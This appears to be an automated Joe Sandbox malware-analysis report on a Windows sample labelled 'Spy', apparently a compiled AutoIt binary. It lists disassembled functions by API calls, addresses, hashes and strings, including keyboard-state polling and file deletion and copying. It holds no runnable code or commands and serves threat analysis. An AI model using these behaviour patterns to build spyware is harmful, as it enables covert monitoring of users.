                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                      • String ID:
                                                      • API String ID: 1246142700-0
                                                      • Opcode ID: c7db71753e2e0a7228a01325bff2382d9ab8f7eb7f92c1d84feca4b4c4c49508
                                                      • Instruction ID: 652b5b1d63dc317ac7cc9e028d66bcdae65bf95b47358597ad2cb3db93ee8ac3
                                                      • Opcode Fuzzy Hash: c7db71753e2e0a7228a01325bff2382d9ab8f7eb7f92c1d84feca4b4c4c49508
                                                      • Instruction Fuzzy Hash: 86B1E975A00109AFDB14EFA5C989DAEBBF9FF88304B148459F906EB261DB70ED41CB50
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00AE0896
                                                      • SetKeyboardState.USER32(?), ref: 00AE0901
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00AE0921
                                                      • GetKeyState.USER32(000000A0), ref: 00AE0938
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00AE0967
                                                      • GetKeyState.USER32(000000A1), ref: 00AE0978
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00AE09A4
                                                      • GetKeyState.USER32(00000011), ref: 00AE09B2
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00AE09DB
                                                      • GetKeyState.USER32(00000012), ref: 00AE09E9
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00AE0A12
                                                      • GetKeyState.USER32(0000005B), ref: 00AE0A20
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 10db3c47cdef1a76adfcf512a8b9c7903b67318393f79779b78c64e87a959fe4
                                                      • Instruction ID: 6a8fb85d9b486da75056955d4c20d7fb509b7a40067e872e83ee3bbb5f2bc478
                                                      • Opcode Fuzzy Hash: 10db3c47cdef1a76adfcf512a8b9c7903b67318393f79779b78c64e87a959fe4
                                                      • Instruction Fuzzy Hash: D851B870A047D829FB35EBB24550BAABFB49F11380F488599D5C2571C3DAE49ACCCBA1
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 00ADCE1C
                                                      • GetWindowRect.USER32(00000000,?), ref: 00ADCE2E
                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ADCE8C
                                                      • GetDlgItem.USER32(?,00000002), ref: 00ADCE97
                                                      • GetWindowRect.USER32(00000000,?), ref: 00ADCEA9
                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ADCEFD
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00ADCF0B
                                                      • GetWindowRect.USER32(00000000,?), ref: 00ADCF1C
                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ADCF5F
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00ADCF6D
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ADCF8A
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00ADCF97
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: f45da88f257a7c2cea42ddd1d5f1cd8a1a148141604b6b599c5b21e54e1dd420
                                                      • Instruction ID: a1d0915670c199780f843d40b73ed8735f2956b82015b6b6941eb7036d55cee9
                                                      • Opcode Fuzzy Hash: f45da88f257a7c2cea42ddd1d5f1cd8a1a148141604b6b599c5b21e54e1dd420
                                                      • Instruction Fuzzy Hash: 4C516271B10205AFDF18DF69CD89AAEBBB6EB88710F54812DF516D7290DBB0AD40CB50
                                                      APIs
                                                        • Part of subcall function 00A81F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A82412,?,00000000,?,?,?,?,00A81AA7,00000000,?), ref: 00A81F76
                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00A824AF
                                                      • KillTimer.USER32(-00000001,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00A8254A
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00ABBFE7
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00ABC018
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00ABC02F
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00ABC04B
                                                      • DeleteObject.GDI32(00000000), ref: 00ABC05D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: 8e09a0afe9f8385a5d69fde51639adee5613eacb3ba7ab77e12ec6aaaf9c9f93
                                                      • Instruction ID: 855b56e229e78838ccbc1b551019f69a53ac0c8b04908b493e9c0b83c536cec1
                                                      • Opcode Fuzzy Hash: 8e09a0afe9f8385a5d69fde51639adee5613eacb3ba7ab77e12ec6aaaf9c9f93
                                                      • Instruction Fuzzy Hash: 4361DA30164601DFCB25BF15CD48B7AB7F1FB41322F508929E4824BAA1CBB1AD90DFA0
                                                      APIs
                                                        • Part of subcall function 00A829AB: GetWindowLongW.USER32(?,000000EB), ref: 00A829BC
                                                      • GetSysColor.USER32(0000000F), ref: 00A825AF
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: 9e402e4772f67a47f6915ac3a53356ce83794a34025210f8b5387e9244d7af9d
                                                      • Instruction ID: 0677e9830392cd669a9e1d844be19174304c5cffbde23065dee6903d350382a8
                                                      • Opcode Fuzzy Hash: 9e402e4772f67a47f6915ac3a53356ce83794a34025210f8b5387e9244d7af9d
                                                      • Instruction Fuzzy Hash: B641D331000144AFDB247F289C88BF93B66FB0A331F584265FD669B1E6EB748D81DB21
                                                      APIs
                                                        • Part of subcall function 00AA0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A92A3E,?,00008000), ref: 00AA0BA7
                                                        • Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A92ADF
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A92C2C
                                                        • Part of subcall function 00A93EBE: _wcscpy.LIBCMT ref: 00A93EF6
                                                        • Part of subcall function 00AA386D: _iswctype.LIBCMT ref: 00AA3875
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 537147316-3738523708
                                                      • Opcode ID: 616be62f3bc428525080f497d8ecb6ddb56cce0234bfcba433067856a7822df8
                                                      • Instruction ID: 1874e6b1860507ebccfc4c52fc94275e3d4228f81597712d39478b6c76928b74
                                                      • Opcode Fuzzy Hash: 616be62f3bc428525080f497d8ecb6ddb56cce0234bfcba433067856a7822df8
                                                      • Instruction Fuzzy Hash: DD027031208341AFCB24EF24C991EAFBBF5AF99354F10491DF496972A2DB30D949CB52
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,00B10980), ref: 00AEAF4E
                                                      • GetDriveTypeW.KERNEL32(00000061,00B3B5F0,00000061), ref: 00AEB018
                                                      • _wcscpy.LIBCMT ref: 00AEB042
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2820617543-1000479233
                                                      • Opcode ID: 8e4236369f8198b05c28735d46c0b51bad1df232adb2d97a8f87f05154b4fe66
                                                      • Instruction ID: e5123d016a4c9ac1416e57fe098715c425022d461096a7d9a302712894c5bea9
                                                      • Opcode Fuzzy Hash: 8e4236369f8198b05c28735d46c0b51bad1df232adb2d97a8f87f05154b4fe66
                                                      • Instruction Fuzzy Hash: 6451CC722183469FC710EF15CA91AABB7E5EFA4300F60481DF596472A2EB30ED09CB52
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __i64tow__itow__swprintf
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 421087845-2263619337
                                                      • Opcode ID: d1300be563d487e402a7398863e9dece826598339aaa84948e7486728b553892
                                                      • Instruction ID: 647a189cb234ec2b06067beb98cd595d71b373eb044ca6de6025f06d3c68e0db
                                                      • Opcode Fuzzy Hash: d1300be563d487e402a7398863e9dece826598339aaa84948e7486728b553892
                                                      • Instruction Fuzzy Hash: 3941B37160420AAFEB24EF78D941EAA77F8EB49340F20446EE549D7292EB3199418710
                                                      APIs
                                                      • _memset.LIBCMT ref: 00B0778F
                                                      • CreateMenu.USER32 ref: 00B077AA
                                                      • SetMenu.USER32(?,00000000), ref: 00B077B9
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B07846
                                                      • IsMenu.USER32(?), ref: 00B0785C
                                                      • CreatePopupMenu.USER32 ref: 00B07866
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B07893
                                                      • DrawMenuBar.USER32 ref: 00B0789B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                      • String ID: 0$F
                                                      • API String ID: 176399719-3044882817
                                                      • Opcode ID: 7c7c8e5d684bb453cdf060b7f4e8d1851c4219e1ae8c4d84478cca2e3ed7aeec
                                                      • Instruction ID: 8ddbb137d1f5af91eab640bffacb3079460eb9982a7cfa22b7d0da5128e8da6e
                                                      • Opcode Fuzzy Hash: 7c7c8e5d684bb453cdf060b7f4e8d1851c4219e1ae8c4d84478cca2e3ed7aeec
                                                      • Instruction Fuzzy Hash: 8F413974A00209EFDB10DF65D888A9ABBF5FF49310F1485A9F945A7390DB70AD10CF50
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B07B83
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00B07B8A
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B07B9D
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00B07BA5
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B07BB0
                                                      • DeleteDC.GDI32(00000000), ref: 00B07BB9
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00B07BC3
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B07BD7
                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B07BE3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: static
                                                      • API String ID: 2559357485-2160076837
                                                      • Opcode ID: 26496bf6bcbed5d577e42a3aa6d9835f22b1d50cf374e72301d1cccac165b8fa
                                                      • Instruction ID: 627961d14c9548f6b83d428f7812a069ba21897db7c948aa89ee0cd32981bae5
                                                      • Opcode Fuzzy Hash: 26496bf6bcbed5d577e42a3aa6d9835f22b1d50cf374e72301d1cccac165b8fa
                                                      • Instruction Fuzzy Hash: D2318A32104219ABDF11AF64DC49FDB7FA9FF09320F104255FA55A61E0CB75E860DBA0
                                                      APIs
                                                        • Part of subcall function 00AE951A: __time64.LIBCMT ref: 00AE9524
                                                        • Part of subcall function 00A94A8C: _fseek.LIBCMT ref: 00A94AA4
                                                      • _wcscpy.LIBCMT ref: 00AE9802
                                                      • _wcscat.LIBCMT ref: 00AE9815
                                                      • _wcscat.LIBCMT ref: 00AE9850
                                                      • _wcscat.LIBCMT ref: 00AE9863
                                                        • Part of subcall function 00AE9560: _memmove.LIBCMT ref: 00AE9599
                                                        • Part of subcall function 00AE9560: _memmove.LIBCMT ref: 00AE95A8
                                                      • _wcscmp.LIBCMT ref: 00AE97AA
                                                        • Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DE1
                                                        • Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DF4
                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AE9A0D
                                                      • _wcsncpy.LIBCMT ref: 00AE9A80
                                                      • DeleteFileW.KERNEL32(?,?), ref: 00AE9AB6
                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AE9ACC
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AE9ADD
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AE9AEF
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$_wcscat_wcscmp$_memmove$Copy__time64_fseek_wcscpy_wcsncpy
                                                      • String ID:
                                                      • API String ID: 3301145884-0
                                                      • Opcode ID: 00c950891476e95335a80a55e033a9b169375aec3dd18adde21297a2aa8aae56
                                                      • Instruction ID: 3095023f62ac59f50fe565d7bb0aae3c1f0f154f901b7a083ea9bab1da3feeb1
                                                      • Opcode Fuzzy Hash: 00c950891476e95335a80a55e033a9b169375aec3dd18adde21297a2aa8aae56
                                                      • Instruction Fuzzy Hash: B5C13BB1A00218AADF21DF95CD85EDFB7BDAF49340F0040AAF609E7151EB709A858F65
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AA706B
                                                        • Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58
                                                      • __gmtime64_s.LIBCMT ref: 00AA7104
                                                      • __gmtime64_s.LIBCMT ref: 00AA713A
                                                      • __gmtime64_s.LIBCMT ref: 00AA7157
                                                      • __allrem.LIBCMT ref: 00AA71AD
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA71C9
                                                      • __allrem.LIBCMT ref: 00AA71E0
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA71FE
                                                      • __allrem.LIBCMT ref: 00AA7215
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA7233
                                                      • __invoke_watson.LIBCMT ref: 00AA72A4
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                      • String ID:
                                                      • API String ID: 384356119-0
                                                      • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                      • Instruction ID: b151e5df876914c4745625510b657f1ac2cd7745b371433e9031b2bef797cd9c
                                                      • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                      • Instruction Fuzzy Hash: EF71D272A04716ABDB149F79CD81BAFB7B8AF16320F14422AF514E72C2E774DA448790
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AE2CE9
                                                      • GetMenuItemInfoW.USER32(00B47890,000000FF,00000000,00000030), ref: 00AE2D4A
                                                      • SetMenuItemInfoW.USER32(00B47890,00000004,00000000,00000030), ref: 00AE2D80
                                                      • Sleep.KERNEL32(000001F4), ref: 00AE2D92
                                                      • GetMenuItemCount.USER32(?), ref: 00AE2DD6
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00AE2DF2
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00AE2E1C
                                                      • GetMenuItemID.USER32(?,?), ref: 00AE2E61
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AE2EA7
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE2EBB
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE2EDC
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                      • String ID:
                                                      • API String ID: 4176008265-0
                                                      • Opcode ID: 8858c905212af1af4760e7dec02058b49225e394307166a738d6ed37d4f0988c
                                                      • Instruction ID: 6ceaef0477b98ad1a0e53d1e87785269083c37a7535ef611175946cd88650505
                                                      • Opcode Fuzzy Hash: 8858c905212af1af4760e7dec02058b49225e394307166a738d6ed37d4f0988c
                                                      • Instruction Fuzzy Hash: 7C61AAB0900299AFEF21DF66CD88AEEBFBDEB01304F144559F941A7251DB71AE45CB20
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B075CA
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B075CD
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00B075F1
                                                      • _memset.LIBCMT ref: 00B07602
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B07614
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B0768C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow_memset
                                                      • String ID:
                                                      • API String ID: 830647256-0
                                                      • Opcode ID: fb03cc28c621c4a122b5ab41814ace0a9efee35a3711ae8d8803b94dafe9d46c
                                                      • Instruction ID: c4729f34c2894ba0344c44bd3b7a3fc152224e2045a7fdb489dbdff5f93cd4e2
                                                      • Opcode Fuzzy Hash: fb03cc28c621c4a122b5ab41814ace0a9efee35a3711ae8d8803b94dafe9d46c
                                                      • Instruction Fuzzy Hash: FC616F75944208AFDB10DF64CC85EEEBBF8EB09710F104195FA15A72E1DB70AE41DB50
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AD77DD
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00AD7836
                                                      • VariantInit.OLEAUT32(?), ref: 00AD7848
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AD7868
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00AD78BB
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AD78CF
                                                      • VariantClear.OLEAUT32(?), ref: 00AD78E4
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00AD78F1
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AD78FA
